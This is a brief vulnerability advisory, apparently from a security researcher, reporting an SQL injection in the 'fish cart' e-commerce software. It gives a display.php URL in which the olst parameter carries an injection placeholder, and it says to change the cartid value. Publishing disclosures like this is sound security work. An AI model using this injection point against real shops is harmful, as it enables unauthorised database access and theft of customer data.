|
vendor site: http://fishcart.org/
product :fish cart
bug:injection sql
risk : medium
injection sql :
/display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql]
( change the cartid value with yours )
laurent gaffie
http://s-a-p.ca/
contact: saps.audit@gmail.com